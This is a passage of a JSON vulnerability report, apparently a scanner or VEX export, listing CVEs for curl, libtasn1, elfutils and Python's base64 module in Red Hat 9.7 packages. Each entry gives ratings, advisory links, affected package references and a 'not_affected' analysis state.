          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        704
      ],
      "description": "When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the \"base64\" module the characters \"+/\" will always be accepted, regardless of the value of the \"altchars\" parameter, typically used to establish an \"alternative base64 alphabet\" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues.\n\nThis behavior can only be insecure if your application uses an alternate base64 alphabet (without \"+/\"). If your application does not use the \"altchars\" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet.\n\nThe attached patches DO NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python. Users are recommended to mitigate by verifying user-controlled inputs match the base64 alphabet they are expecting or verifying that their application would not be affected if the b64decode() functions accepted \"+\" or \"/\" outside of altchars.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-12781"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-12781"
        },
        {
          "url": "https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b"
        },
        {
          "url": "https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947"
        },
        {
          "url": "https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5"
        },
        {
          "url": "https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76"
        },
        {
          "url": "https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5"
        },
        {
          "url": "https://github.com/python/cpython/issues/125346"
        },
        {
          "url": "https://github.com/python/cpython/pull/141128"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12781"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-12781"
        }
      ],
      "published": "2026-01-21T20:16:04+00:00",
      "updated": "2026-02-02T17:25:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-13034",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When using the `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool, curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13034"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13034"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-01-20T14:54:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-13151",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Stack-based buffer overflow in libtasn1 version: v4.20.0. The function fails to validate the size of input data resulting in a buffer overflow in asn1_expend_octet_string.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13151"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/08/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13151"
        },
        {
          "url": "https://gitlab.com/gnutls/libtasn1"
        },
        {
          "url": "https://gitlab.com/gnutls/libtasn1/-/merge_requests/121"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7954-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7954-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13151"
        },
        {
          "url": "https://www.kb.cert.org/vuls/id/271649"
        }
      ],
      "published": "2026-01-07T22:15:43+00:00",
      "updated": "2026-02-02T19:27:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "4.16.0-9.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libtasn1@4.16.0-9.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-1371",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability has been found in GNU elfutils 0.192 and classified as problematic. This vulnerability affects the function handle_dynamic_symtab of the file readelf.c of the component eu-read. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The patch is identified as b38e562a4c907e08171c76b8b2def8464d5a104a. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1371"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1371"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1371"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15926"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295978"
        },
        {
          "url": "https://vuldb.com/?id.295978"
        },
        {
          "url": "https://vuldb.com/?submit.496484"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T03:15:09+00:00",
      "updated": "2025-11-04T20:13:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "0.193-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
